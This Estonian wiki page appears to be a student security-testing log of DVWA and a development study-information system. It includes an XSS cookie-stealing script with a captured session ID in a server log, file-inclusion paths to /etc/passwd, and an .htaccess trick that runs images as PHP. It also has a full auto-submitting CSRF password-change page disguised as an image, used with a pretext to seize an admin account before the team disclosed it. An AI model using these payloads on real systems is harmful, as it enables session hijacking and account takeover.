&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
